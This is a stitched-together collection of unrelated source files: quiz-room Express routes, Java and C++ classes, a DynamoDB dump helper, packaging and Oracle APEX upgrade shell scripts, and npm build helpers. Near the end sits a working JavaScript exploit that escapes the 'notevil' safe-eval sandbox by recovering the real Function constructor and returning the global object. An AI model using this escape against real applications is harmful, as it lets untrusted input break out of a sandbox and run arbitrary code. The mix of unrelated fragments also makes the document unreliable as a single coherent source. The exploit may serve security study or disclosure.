  Rooms.create({
    _id: roomcode,
  })
    .then(() => {
      res.json({ roomid: roomcode });
    })
    .catch((err) => {
      res.sendStatus(500);
      throw err;
    });
});
// Append a new round (with the given categories) to a room.
// Responds 200 on success, 404 on missing params, 500 otherwise.
router.post("/:roomid/rounds", function (req, res) {
  const reqRoomid = req.params.roomid;
  const reqCategories = req.body.categories;
  Rooms.findById(reqRoomid)
    .then((room) => {
      if (reqRoomid === undefined || reqCategories === undefined) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      // Round ids are 1-based and sequential, so the next id is simply
      // the current round count plus one. (The original counted the
      // array with a forEach loop, which is equivalent to .length.)
      room.rounds.push({
        _id: room.rounds.length + 1,
        categories: reqCategories,
      });
      room.save();
      res.sendStatus(200);
    })
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Summarise a room's state: number of questions in the current (last)
// round, the id of the most recent question, the round count, and the
// number of teams.
router.get("/:roomid", function (req, res) {
  const reqRoomid = req.params.roomid;
  let questions = 0;
  let lastQuestionid = 0;
  let rounds = 0;
  let teams = 0;
  Rooms.findById(reqRoomid)
    .then((room) => {
      if (reqRoomid === undefined) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      rounds = room.rounds.length;
      // question is the amount of questions in the last round
      questions = room.rounds[rounds - 1].questions.length;
      // NOTE(review): this indexing throws (surfacing as a 500 via the
      // catch below) when the room has no rounds or the last round has
      // no questions yet.
      lastQuestionid =
        room.rounds[rounds - 1].questions[parseInt(questions) - 1]._id;
      // amount of teams
      teams = room.teams.length;
      return [questions, lastQuestionid, rounds, teams];
    })
    .then((data) => {
      res.send({
        question: data[0],
        lastQuestionid: data[1],
        round: data[2],
        teams: data[3],
      });
    })
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Register a new question (by id) in the room's current (last) round.
router.post("/:roomid/rounds/question", function (req, res) {
  const reqRoomid = req.params.roomid;
  const reqQuestionid = req.body.questionid;
  Rooms.findById({ _id: reqRoomid })
    .then((room) => {
      if (reqRoomid === undefined || reqQuestionid === undefined) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      room.rounds[room.rounds.length - 1].questions.push({
        _id: reqQuestionid,
      });
      // need to save room, not round because round
      // is a subdocument of room
      room.save();
    })
    .then(() => {
      res.sendStatus(200);
    })
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Compute a team's score summary: its accumulated roundPoints plus the
// number of correct answers per round.
// NOTE(review): if no team matches, no response is ever sent and the
// request hangs -- confirm whether a 404 should be added.
router.get("/:roomid/teams/:teamid/score", function (req, res) {
  const reqRoomid = req.params.roomid;
  const reqTeamid = req.params.teamid;
  Rooms.find({ _id: reqRoomid })
    .then((score) => {
      if (reqRoomid === undefined || reqTeamid === undefined) {
        throw "params";
      } else {
        return score;
      }
    })
    .then((score) => {
      // for each room
      score.forEach((element) => {
        // for each team in each room
        for (let i = 0; i < element.teams.length; i++) {
          // check if name is team name
          if (element.teams[i].name === reqTeamid) {
            // check how many questions correct
            // per round the team has
            let scoresPerRound = {};
            let rounds = 0;
            let pointsPerRound = 0;
            // for each answer that is correct
            // add a point to object
            element.teams[i].answers.forEach((answer) => {
              if (answer.isCorrect) {
                // if the round doesn't exist, explicitly
                // make it 1 else just add one
                if (!scoresPerRound[answer.round]) {
                  scoresPerRound[answer.round] = 1;
                  rounds++;
                } else {
                  scoresPerRound[answer.round]++;
                }
                // Snapshot of per-round correct counts as an array.
                pointsPerRound = Object.values(scoresPerRound);
              }
            });
            res.json({
              roundPoints: element.teams[i].roundPoints,
              rounds: pointsPerRound,
              roundAmount: rounds,
            });
          }
        }
      });
    })
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Register a new team (by name) in a room.
router.post("/:roomid/teams", function (req, res) {
  const reqRoomid = req.params.roomid;
  const reqTeamName = req.body.teamName;
  Rooms.findById(reqRoomid)
    .then((room) => {
      if (reqRoomid === undefined || reqTeamName === undefined) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      room.teams.push({
        name: reqTeamName,
      });
      room.save();
    })
    // BUGFIX: the original passed res.sendStatus(200) directly to
    // .then(), which invoked sendStatus immediately while the chain was
    // being built (even on failure). Wrap it in a callback so the 200
    // is only sent after the previous step settles.
    .then(() => res.sendStatus(200))
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Approve a team (by name) in a room.
router.put("/:roomid/teams/:teamid", function (req, res) {
  const reqRoomid = req.params.roomid;
  const reqTeamid = req.params.teamid;
  Rooms.findById(reqRoomid)
    .then((room) => {
      if (reqRoomid === undefined || reqTeamid === undefined) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      // NOTE(review): find() yields undefined when no team matches,
      // which throws here and surfaces as a 500 via the catch below.
      let team = room.teams.find((team) => team.name === reqTeamid);
      team.isApproved = true;
      room.save();
    })
    // BUGFIX: wrap in a callback — the original invoked sendStatus
    // eagerly while the chain was being constructed.
    .then(() => res.sendStatus(200))
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Remove a team (by name) from a room.
router.delete("/:roomid/teams/:teamid", function (req, res) {
  const reqRoomid = req.params.roomid;
  const reqTeamid = req.params.teamid;
  Rooms.findById(reqRoomid)
    .then((room) => {
      if (reqRoomid === undefined || reqTeamid === undefined) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      const teams = room.teams;
      const index = teams.findIndex((team) => team.name === reqTeamid);
      // BUGFIX: findIndex returns -1 when the team is absent, and
      // splice(-1, 1) would then delete the LAST team; only splice on
      // an actual hit.
      if (index !== -1) {
        teams.splice(index, 1);
      }
      room.save();
    })
    // BUGFIX: wrap in a callback — the original invoked sendStatus
    // eagerly while the chain was being constructed.
    .then(() => res.sendStatus(200))
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// List all teams of a room (name, approval state, points, answers).
router.get("/:roomid/teams", function (req, res) {
  const reqRoomid = req.params.roomid;
  Rooms.findById(reqRoomid)
    .then((room) => {
      if (reqRoomid === undefined) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      // (The original had an if/else here declaring block-scoped,
      // immediately-discarded `teams` constants — dead code with an
      // inverted condition; removed.)
      const message = [];
      room.teams.forEach((team) => {
        message.push({
          name: team.name,
          isApproved: team.isApproved,
          roundPoints: team.roundPoints,
          answers: team.answers,
        });
      });
      res.send(message);
    })
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Look up one team's answer (and its correctness flag) for a question.
router.get("/:roomid/teams/:teamid/answers/:questionid", function (req, res) {
  const reqRoomid = req.params.roomid;
  const reqTeamid = req.params.teamid;
  const reqQuestionid = req.params.questionid;
  let teamAnswer;
  // BUGFIX: declared locally — the original assigned an undeclared
  // `isCorrect`, leaking an implicit global (and throwing in strict mode).
  let isCorrect;
  Rooms.findById(reqRoomid)
    .then((room) => {
      if (
        reqRoomid === undefined ||
        reqTeamid === undefined ||
        reqQuestionid === undefined
      ) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      // NOTE(review): if no team/answer matches, no response is sent and
      // the request hangs — confirm whether a 404 should be added here.
      room.teams.forEach((team) => {
        if (team.name === reqTeamid) {
          team.answers.forEach((answer) => {
            if (answer._id === parseInt(reqQuestionid)) {
              teamAnswer = answer.answer;
              isCorrect = answer.isCorrect;
              res.send({ answer: teamAnswer, isCorrect: isCorrect });
            }
          });
        }
      });
    })
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Grade one answer: set the isCorrect flag on the matching team/question
// answer (quiz-master endpoint).
router.put("/:roomid/teams/:teamid/answers/:questionid/approve", function (
  req,
  res
) {
  const reqRoomid = req.params.roomid;
  const reqTeamid = req.params.teamid;
  const reqQuestionid = req.params.questionid;
  const reqIsCorrect = req.body.isCorrect;
  Rooms.findById(reqRoomid)
    .then((room) => {
      if (
        reqRoomid === undefined ||
        reqTeamid === undefined ||
        reqQuestionid === undefined ||
        reqIsCorrect === undefined
      ) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      // Walk every team/answer and update the matching one in place.
      room.teams.forEach((team) => {
        if (team.name === reqTeamid) {
          team.answers.forEach((answer) => {
            if (answer._id === parseInt(reqQuestionid)) {
              answer.isCorrect = reqIsCorrect;
            }
          });
        }
      });
      room.save();
    })
    .then(() => {
      res.sendStatus(200);
    })
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Record (or overwrite) a team's answer to the current question, i.e.
// the last question of the last round.
router.put("/:roomid/teams/:teamid/answers", function (req, res) {
  const reqRoomid = req.params.roomid;
  const reqTeamid = req.params.teamid;
  const reqAnswer = req.body.answer;
  Rooms.findById(reqRoomid)
    .then((room) => {
      if (
        reqRoomid === undefined ||
        reqTeamid === undefined ||
        reqAnswer === undefined
      ) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      // The "current" question is the last question of the last round.
      let roundAmount = room.rounds.length - 1;
      let questionAmount = room.rounds[roundAmount].questions.length - 1;
      const questionid = room.rounds[roundAmount].questions[questionAmount];
      // NOTE(review): the comparison reads questionid._id but the stored
      // entries use questionid.id — presumably mongoose's string alias
      // for _id; confirm the two compare as intended.
      room.teams.forEach((team) => {
        if (team.name === reqTeamid) {
          // only push if it doesn't exist
          let answerAmount = team.answers.length - 1;
          // if the questionid is the same as the last questionid
          if (team.answers.length > 0) {
            if (questionid._id === team.answers[answerAmount]._id) {
              // Overwrite the team's previous answer to this question by
              // rebuilding the array with the last entry swapped out.
              let changes = [
                ...team.answers.slice(0, answerAmount),
                {
                  _id: questionid.id,
                  answer: reqAnswer,
                  round: room.rounds.length,
                },
              ];
              team.answers = changes;
            } else {
              team.answers.push({
                _id: questionid.id,
                answer: reqAnswer,
                round: room.rounds.length,
              });
            }
          } else {
            // First answer this team gives at all.
            team.answers.push({
              _id: questionid.id,
              answer: reqAnswer,
              round: room.rounds.length,
            });
          }
        }
      });
      room.save();
    })
    .then(() => {
      res.sendStatus(200);
    })
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Add round points to a team's running total.
router.post("/:roomid/teams/:teamid/score", function (req, res) {
  const reqRoomid = req.params.roomid;
  const reqTeamid = req.params.teamid;
  const reqRoundpoints = req.body.roundPoints;
  Rooms.findById(reqRoomid)
    .then((room) => {
      if (
        reqRoomid === undefined ||
        reqTeamid === undefined ||
        reqRoundpoints === undefined
      ) {
        throw "params";
      } else {
        return room;
      }
    })
    .then((room) => {
      room.teams.forEach((team) => {
        if (team.name === reqTeamid) {
          // First score for a team initialises the counter.
          if (team.roundPoints !== undefined) {
            team.roundPoints += reqRoundpoints;
          } else {
            team.roundPoints = reqRoundpoints;
          }
        }
      });
      room.save();
    })
    // BUGFIX: the original never answered on success, leaving the
    // request hanging until the client timed out.
    .then(() => res.sendStatus(200))
    .catch((err) => {
      if (err == "params") {
        res.status(404).send("404: Missing parameters");
      } else {
        res.sendStatus(500);
      }
      throw err;
    });
});
// Expose the /rooms router for mounting by the main app.
module.exports = router;
|
package mainclient.unstablePkg.methodRemoved;
import main.unstablePkg.methodRemoved.MethodRemoved;
/**
 * Client-side subclass of {@code MethodRemoved}; judging by the package
 * names, presumably part of an API-evolution test where the inherited
 * method is removed in a later library version — confirm against the
 * test harness.
 */
public class MethodRemovedExt extends MethodRemoved {
    /** Calls the inherited method via an ordinary (virtual) call. */
    public int methodRemovedClientExt() {
        return methodRemoved();
    }

    /** Calls the same method through an explicit super reference. */
    public int methodRemovedClientSuper() {
        return super.methodRemoved();
    }
}
|
<gh_stars>100-1000
/* mbed Microcontroller Library
* Copyright (c) 2006-2013 ARM Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef __GAP_EVENTS_H__
#define __GAP_EVENTS_H__
#include "blecommon.h"
/**************************************************************************/
/*!
\brief
The base class used to abstract away the callback events that can be
triggered with the GAP.
*/
/**************************************************************************/
class GapEvents
{
    public:
        /******************************************************************/
        /*!
            \brief
            Identifies GAP events generated by the radio HW when an event
            callback occurs.
        */
        /******************************************************************/
        // Pure event-id container: the class has no data members or
        // virtual functions, only this enum.
        typedef enum gapEvent_e {
            GAP_EVENT_TIMEOUT       = 1,    /**< Advertising timed out before a connection could be established. */
            GAP_EVENT_CONNECTED     = 2,    /**< A connection was established with a central device. */
            GAP_EVENT_DISCONNECTED  = 3     /**< A connection was closed or lost with a central device. */
        } gapEvent_t;
};
#endif // ifndef __GAP_EVENTS_H__
|
<gh_stars>0
package com.acgist.snail.context.exception;
/**
 * <p>Download exception</p>
 * <p>Signals errors raised while creating a download task or during the
 * download itself.</p>
 *
 * @author acgist
 */
public class DownloadException extends Exception {

    private static final long serialVersionUID = 1L;

    /**
     * Default constructor. The message string ("下载异常", i.e.
     * "download exception") is user-facing and kept verbatim.
     */
    public DownloadException() {
        super("下载异常");
    }

    /**
     * @param message error message
     */
    public DownloadException(String message) {
        super(message);
    }

    /**
     * @param cause original cause
     */
    public DownloadException(Throwable cause) {
        super(cause);
    }

    /**
     * @param message error message
     * @param cause original cause
     */
    public DownloadException(String message, Throwable cause) {
        super(message, cause);
    }
}
|
from decimal import Decimal
from typing import Any, Optional
import json
def _dump_dynamodb_table(table: Any) -> Optional[str]:
if not table:
return None
items = []
for item in table.scan()['Items']:
formatted_item = {}
for key, value in item.items():
if isinstance(value, Decimal):
formatted_item[key] = float(value)
else:
formatted_item[key] = value
items.append(formatted_item)
return json.dumps(items, indent=2) |
#!/bin/sh
set -eu
cd "$(dirname "$0")/../.."
# Build macOS installer packages (pkg and dmg) for the application with
# jpackage. The ${project.*}/${moduleName}/${mainClass} placeholders are
# substituted by Maven resource filtering before this script runs.
main() {
    if ! command -v jpackage >/dev/null 2>&1; then
        >&2 echo "jpackage: command not found"
        exit 1
    fi

    # The main artifact must already be built.
    artifact_file="${project.build.directory}/${project.build.finalName}.jar"
    if [ ! -f "$artifact_file" ]; then
        >&2 echo "$artifact_file: no such file"
        exit 1
    fi

    # Runtime dependency jars are expected to have been copied here
    # beforehand (presumably by a Maven dependency-copy step).
    dependency_dir="${project.build.directory}/dependency"
    if [ ! -d "$dependency_dir" ]; then
        >&2 echo "$dependency_dir: no such directory"
        exit 1
    fi

    # Module path = main jar plus every dependency jar, colon-separated.
    modulepath="$artifact_file$(printf ":%s" "$dependency_dir"/*.jar)"
    echo "modulepath = $modulepath"

    for type in pkg dmg; do
        echo "Building $type"
        jpackage \
            --type "$type" \
            --app-version "$(
                # Strip -SNAPSHOT/+build metadata and leading zero
                # segments so the version is acceptable to jpackage.
                echo "${project.version}" |
                    cut -d - -f 1 |
                    cut -d + -f 1 |
                    sed "s/^00*\.//"
            )" \
            --copyright "Copyright 2019-2021 Foreseeti AB <https://foreseeti.com>" \
            --description "${project.description}" \
            --name "${project.name}" \
            --dest "${project.build.directory}" \
            --vendor "${project.organization.name}" \
            --add-modules "org.leadpony.joy.classic" \
            --module-path "$modulepath" \
            --input "${project.build.directory}/app-input" \
            --module "${moduleName}/${mainClass}" \
            --mac-package-identifier "${project.groupId}.${project.artifactId}" \
            --mac-package-name "${project.name}" \
            --license-file "${project.basedir}/LICENSE" \
            --resource-dir "${project.basedir}/jpackage-resources"
    done
}
main
|
#!/bin/bash
# daxul.sh
# Program to upgrade the APEX schema in the database. This is useful when
# access to the patchsets is not available (when you're not a paying Oracle
# customer).
#
# Relies on the apex installation files which comes with a java program to export
# the required workspace/app export files; Also, a library in the Oracle
# installation files, so ORACLE_HOME is expected to be set.
#
# Basically, the goal is to export all workspaces and applications; drop the apex
# schema and re run in the apex installation.
# Define exit codes
INVALID_ARGS=1
ORACLE_UNDEFINED=2
PROGRAM_UNDEFINED=3
OJDBC_UNDEFINED=4
USER_EXIT=5

# Parse paired "-flag value" arguments. Only ONE shift happens per
# iteration, so each value string is revisited as $1 on the next pass
# and falls through the no-op *) case; -gt 1 stops once fewer than two
# arguments remain.
while [[ $# -gt 1 ]]; do
    key="$1"
    case $key in
        -h|--host)
            DB_HOST=$2
            ;;
        -p|--port)
            DB_PORT=$2
            ;;
        -s|--sid)
            DB_SID=$2
            ;;
        -i|--images)
            IMAGE_PATH=$2
            ;;
        -a|--apex)
            APEX_PATH=$2
            ;;
        -du|--dbauser)
            SYS_USER=$2
            ;;
        -dp|--dbapass)
            SYS_PASS=$2
            ;;
        -sp|--systempass)
            SYSTEM_PASS=$2
            ;;
        -su|--systemuser)
            SYSTEM_USER=$2
            ;;
        *)
            ;;
    esac
    shift
done

# Backup program paths/dependencies
OJDBC_PATH=lib/ojdbc5.jar
BACKUP_PROG_BASE_DIR=${APEX_PATH}/utilities
BACKUP_PROG_FULL_PATH=${BACKUP_PROG_BASE_DIR}/oracle/apex/APEXExport.class

# Get dir of this script so we can reference other scripts.
# Idea taken from: http://stackoverflow.com/a/246128/3476713
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
WORKSPACE_ID_SCRIPT=${SCRIPT_DIR}/generateWorkspaceIds.sql
# Scratch files/directories for workspace ids, exports and config dumps.
WORKSPACE_ID_FILE=$(mktemp)
WORKSPACE_BACKUP_DIR=$(mktemp -d)
INSTANCE_CONFIG_BACKUP_SCRIPT=${SCRIPT_DIR}/backupInstanceConfig.sql
PRE_INSTANCE_CONFIG_FILE=$(mktemp)
POST_INSTANCE_CONFIG_FILE=$(mktemp)
RESTORE_SCRIPT=$(mktemp)
RUN_AND_EXIT_SCRIPT=${SCRIPT_DIR}/runAndExit.sql

print_usage(){
    echo "daxul.sh -h <db_server> -p <db_port> -s <db_sid> -i </path/to/images> -a </path/to/apex> -du <dba_user (e.g. sys)> -dp <dba_password> -su <system user (e.g. system> -sp <system password>" >&2
}

# Dump the parsed configuration. Troubleshooting only: prints passwords.
print_debug(){
    echo "HOST: ${DB_HOST}"
    echo "PORT: ${DB_PORT}"
    echo "SID: ${DB_SID}"
    echo "SYSTEM USER: ${SYSTEM_USER}"
    echo "SYSTEM PASSWORD: ${SYSTEM_PASS}"
    echo "SYS USER: ${SYS_USER}"
    echo "SYS PASSWORD: ${SYS_PASS}"
    echo "CLASSPATH: ${CLASSPATH}"
    echo "IMAGE PATH: ${IMAGE_PATH}"
    echo "APEX PATH: ${APEX_PATH}"
}

# Make sure the correct number of arguments were received
if [[ -z ${DB_HOST}
    || -z ${DB_PORT}
    || -z ${DB_SID}
    || -z ${SYSTEM_USER}
    || -z ${SYSTEM_PASS}
    || -z ${SYS_USER}
    || -z ${SYS_PASS}
    || -z ${IMAGE_PATH}
    || -z ${APEX_PATH}
]]; then
    echo "Wrong number of args. Expected usage: " >&2
    print_usage
    exit ${INVALID_ARGS}
fi

# Make sure ORACLE_HOME points to a valid path
if [[ ! -e ${ORACLE_HOME} ]]; then
    echo "ORACLE_HOME is not set or points to an invalid path on this sytem. Can not continue" >&2
    exit ${ORACLE_UNDEFINED}
fi
export PATH=${PATH}:${ORACLE_HOME}/bin

# The program requires Oracle JDBC drivers in the classpath. Based on my two
# example cases of Oracle installations (the XE server and my workstation)
# it seems there are two possible locations:
#
# 1. $ORACLE_HOME/jdbc/lib/ojdbc5.jar
# 2. $ORACLE_HOME/lib/ojdbc.jar
#
# By default set it to 1, but if that doesn't exist, try pointing it to 2.
if [[ -e ${ORACLE_HOME}/jdbc/${OJDBC_PATH} ]]; then
    OJDBC_PATH=${ORACLE_HOME}/jdbc/${OJDBC_PATH}
elif [[ -e ${ORACLE_HOME}/${OJDBC_PATH} ]]; then
    OJDBC_PATH=${ORACLE_HOME}/${OJDBC_PATH}
else
    echo "Could not find ojdbc5.jar. Is Oracle properly installed?" >&2
    exit ${OJDBC_UNDEFINED}
fi

# The apex path was found, but let us double check the java program is there
if [[ ! -e ${BACKUP_PROG_FULL_PATH} ]]; then
    echo "Could not find the backup program at path ${BACKUP_PROG_FULL_PATH}" >&2
    exit ${PROGRAM_UNDEFINED}
fi

# Error checking all done, now we need to set the classpath so it can be run
export CLASSPATH=${OJDBC_PATH}:${BACKUP_PROG_BASE_DIR}

#print_debug

# Output all workspace id's to a text file
sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${WORKSPACE_ID_SCRIPT} ${WORKSPACE_ID_FILE}

# Backup instance config for later restoration
sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${INSTANCE_CONFIG_BACKUP_SCRIPT} ${PRE_INSTANCE_CONFIG_FILE}

# Export each workspace (and all of its applications) with APEXExport,
# one subdirectory per workspace id.
TOTAL_APP_COUNT=0
while read WID; do
    echo "Workspace ID: ${WID}"
    mkdir ${WORKSPACE_BACKUP_DIR}/${WID}
    cd ${WORKSPACE_BACKUP_DIR}/${WID}
    java oracle.apex.APEXExport -db ${DB_HOST}:${DB_PORT}:${DB_SID} -user ${SYSTEM_USER} -password ${SYSTEM_PASS} -expWorkspace -workspaceid ${WID}
    java oracle.apex.APEXExport -db ${DB_HOST}:${DB_PORT}:${DB_SID} -user ${SYSTEM_USER} -password ${SYSTEM_PASS} -workspaceid ${WID}
    NUM_APPS=$(ls -1 ${WORKSPACE_BACKUP_DIR}/${WID} | wc -l)
    TOTAL_APP_COUNT=$(($TOTAL_APP_COUNT+$NUM_APPS))
done < ${WORKSPACE_ID_FILE}

echo "Uninstalling"
NUM_WORKSPACES=$(ls -1 ${WORKSPACE_BACKUP_DIR} | wc -l)
echo "A total of ${NUM_WORKSPACES} workspaces were backed up, and ${TOTAL_APP_COUNT} applications".
echo "You can view the backed up workspaces/applications at: ${WORKSPACE_BACKUP_DIR}"
echo "You can view the backed up instance config at: ${PRE_INSTANCE_CONFIG_FILE}"
echo "If you continue, Application Express will be completely uninstalled and then re-installed"
echo "All users in the internal workspace will not be restored"
echo "You may have to re-do some of the instance configuration"
read -p "Are you sure you want to continue?: " CONFIRM_CONTINUE
# ^^converts it to uppercase. Idea grabbed from: http://stackoverflow.com/a/2265268/3476713
if [[ ! "${CONFIRM_CONTINUE^^}" = "Y" ]] && [[ ! "${CONFIRM_CONTINUE^^}" = "YES" ]]; then
    exit ${USER_EXIT}
fi

sqlplus ${SYS_USER}/${SYS_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} as sysdba @${RUN_AND_EXIT_SCRIPT} ${APEX_PATH}/apxremov.sql
echo "Uninstalling complete"

echo "Installing APEX"
# Need to change into the directory where the scripts are, since the installation
# script is referencing other scripts - but expecting them in the same current
# working directory.
cd ${APEX_PATH}
sqlplus ${SYS_USER}/${SYS_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} as sysdba @${APEX_PATH}/apexins.sql SYSAUX SYSAUX TEMP /i/

echo "Updating images"
sudo rm -rf ${IMAGE_PATH}/*
sudo cp -r ${APEX_PATH}/images/* ${IMAGE_PATH}/
echo "Image update complete"

# Restore workspaces and applications
while read WID; do
    sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${RUN_AND_EXIT_SCRIPT} ${WORKSPACE_BACKUP_DIR}/${WID}/w${WID}.sql
    for apexApp in ${WORKSPACE_BACKUP_DIR}/${WID}/f*.sql; do
        echo "Installing ${apexApp}"
        sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${RUN_AND_EXIT_SCRIPT} ${apexApp}
    done
done < ${WORKSPACE_ID_FILE}

echo "Restoring instance configuration"
# Build a PL/SQL script that re-applies every non-empty KEY=VALUE pair
# captured before the upgrade.
echo "begin" > ${RESTORE_SCRIPT}
while read BACKED_PROPERTY; do
    IFS='=' read -ra INSTANCE_PARAM <<< "${BACKED_PROPERTY}"
    # If value isn't empty, append update call to the script
    if [[ ! -z ${INSTANCE_PARAM[1]//} ]]; then
        echo "APEX_INSTANCE_ADMIN.SET_PARAMETER('${INSTANCE_PARAM[0]}', '${INSTANCE_PARAM[1]}');" >> ${RESTORE_SCRIPT}
    fi
done < ${PRE_INSTANCE_CONFIG_FILE}
echo "end;" >> ${RESTORE_SCRIPT}
echo "/" >> ${RESTORE_SCRIPT}
echo "exit" >> ${RESTORE_SCRIPT}

# Before updating, get the current config
sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${INSTANCE_CONFIG_BACKUP_SCRIPT} ${POST_INSTANCE_CONFIG_FILE}

# Now, restore settings as they were before the upgrade
sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${RESTORE_SCRIPT}

echo "Restoration complete, script saved to ${RESTORE_SCRIPT}."
echo "You can review the instance config files at:"
echo "- Your existing settings before the upgrade: ${PRE_INSTANCE_CONFIG_FILE}"
echo "- The settings after upgrading APEX and before restoration: ${POST_INSTANCE_CONFIG_FILE}"
echo ""
echo "Post upgrade tasks:"
echo "- Reset the instance admin password: sqlplus system/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${APEX_PATH}/apxchpwd.sql"
echo "- Restart the web container (e.g. sudo systemctl restart tomcat)"
|
# Install npm dependencies for the app in $1: prune modules no longer
# referenced, then `npm install` using the app's own .npmrc. Skipped
# (with a message) when there is no package.json.
install_node_modules() {
  local build_dir=${1:-}

  if [ -e $build_dir/package.json ]; then
    cd $build_dir
    echo "Pruning any extraneous modules"
    npm prune --unsafe-perm --userconfig $build_dir/.npmrc 2>&1
    if [ -e $build_dir/npm-shrinkwrap.json ]; then
      echo "Installing node modules (package.json + shrinkwrap)"
    else
      echo "Installing node modules (package.json)"
    fi
    npm install --unsafe-perm --userconfig $build_dir/.npmrc 2>&1
  else
    echo "Skipping (no package.json)"
  fi
}
# Rebuild native modules for the app in $1 (e.g. after a platform
# change) and install any newly added dependencies. Skipped when there
# is no package.json.
rebuild_node_modules() {
  local build_dir=${1:-}

  if [ -e $build_dir/package.json ]; then
    cd $build_dir
    echo "Rebuilding any native modules"
    npm rebuild 2>&1
    if [ -e $build_dir/npm-shrinkwrap.json ]; then
      echo "Installing any new modules (package.json + shrinkwrap)"
    else
      echo "Installing any new modules (package.json)"
    fi
    npm install --unsafe-perm --userconfig $build_dir/.npmrc 2>&1
  else
    echo "Skipping (no package.json)"
  fi
}
# Buildpack base directory: one level up from this script's directory.
BP_DIR=$(cd $(dirname ${0:-}); cd ..; pwd)

# Extract the entry-point file name from package.json's "scripts.start"
# value (second whitespace-separated token, e.g. `node server.js` ->
# server.js).
# NOTE(review): the inline script uses Python 2 `print` statement
# syntax; it breaks under python3 -- confirm the target stack still
# ships a python2 binary as `python`.
get_file_initial() {
  local FILE_NAME=$(python -c 'import json,sys; f = open("package.json","r"); obj = json.load(f);print obj["scripts"]["start"].split()[1]; f.close()')
  echo $FILE_NAME
}
# When AppDynamics service bindings are present (i.e. $VCAP_SERVICES is
# non-trivially long), generate the agent bootstrap snippet and prepend
# it to the app's entry-point file.
update_server_appd() {
  local build_dir=${1:-}
  LEN=$(echo ${#VCAP_SERVICES})
  # A bound service yields a JSON payload longer than a few characters.
  if [ $LEN -ge 4 ]; then
    echo "Reading Environment Variables for Appdynamics"
    local INIT_FILE=$(get_file_initial)
    python $BP_DIR/extensions/appdynamics/extension_appdy.py $build_dir
    local TEST_DATA=$(cat /tmp/_appd_module.txt)
    # Prepend the snippet to the entry file via a temp copy, then swap.
    echo $TEST_DATA | cat - $build_dir/$INIT_FILE > /tmp/_server.js && mv /tmp/_server.js $build_dir/$INIT_FILE
  fi
}
|
// Proof-of-concept sandbox escape for the `notevil` safe-eval library.
// The evaluated string walks the property descriptors of a function's
// __proto__ to recover the real Function constructor, then uses it to
// execute code outside the sandbox and return the global object.
var safeEval = require('notevil')
// NOTE: this string is the exploit payload itself — do not alter it.
var input = "" +
  "function fn() {};" +
  "var constructorProperty = Object.getOwnPropertyDescriptors(fn.__proto__).constructor;" +
  "var properties = Object.values(constructorProperty);" +
  "properties.pop();" +
  "properties.pop();" +
  "properties.pop();" +
  "var Function = properties.pop();" +
  "(Function('return this'))()";
// If the escape works, this prints the real global object (not a sandbox proxy).
console.log(safeEval(input))
|
python3 exps/node2vec_exp.py --config-file './configs/yamls/node2vec_baseline.yaml' |
#!/bin/bash
# Script that builds androidx SNAPSHOT and runs the androidx integration
# tests from the Studio branch.
set -e
readonly SCRIPT_PATH="$(dirname $(realpath "$0"))"
readonly BASE_PATH="$(realpath "$SCRIPT_PATH/../../..")"
readonly PREBUILTS_DIR="$BASE_PATH/prebuilts"
readonly OUT_DIR="$BASE_PATH/out"
